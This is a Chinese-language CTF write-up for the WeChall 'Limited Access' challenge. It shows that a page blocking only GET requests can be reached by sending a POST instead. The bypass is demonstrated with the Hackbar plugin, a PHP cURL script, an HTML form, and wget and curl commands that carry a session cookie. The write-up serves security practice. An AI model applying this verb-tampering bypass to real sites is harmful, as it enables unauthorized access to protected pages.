题目

目的:访问受保护页面protected/protected.php

查看代码发现只是限制了get请求,但是HTTP有请求:GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, PATCH, PROPFIND, PROPPATCH, LOCK, UNLOCK, TRACE

解决

hackbar

火狐浏览器下使用hackbar插件提交post请求。

Firefox的插件是要经过签名,才能加载到浏览器的。如果修改插件里的任何一个配置文件都会导致签名失效。非签名的只能通过临时加载插件的方式,加载到浏览器里面。因此,我们这里就加载不收费的版本<=2.2.2,这里我们找到一个2.1.3的版本,加载到Firefox浏览器,hack2.1.3安装包 https://github.com/Mr-xn/hackbar2.1.3

解压后,加载.xpi文件,并关闭自动升级。

解 [WeChall] Limited Access (Exploit, HTTP)

a=1只是我随便填的参数,也可以改成其他。

PHP

<?php
 
$cookie="WC=xxxxxxxxxxxxxxxxxxxxx";
$url="http://www.wechall.net/challenge/wannabe7331/limited_access/protected/protected.php";
$post=""; 
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch, CURLOPT_COOKIE, $cookie);
        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        $res = curl_exec ($ch);
        curl_close($ch);
                echo $res;
?>

HTML

新建html文件,填写以下内容。通过模拟表单提交来提交post请求。

<form method="POST" action="https://www.wechall.net/challenge/wannabe7331/limited_access/protected/protected.php">
<input type="submit" value="submit">
</form>

Wget

wget --post-data=limited --header "Cookie: WC=*" http://www.wechall.net/challenge/wannabe7331/limited_access/protected/protected.php

Curl

curl -v -H "Cookie: [...]"  -X POST http://www.wechall.net/challenge/wannabe7331/limited_access/protected/protected.php

参考:
Solutions for Limited Access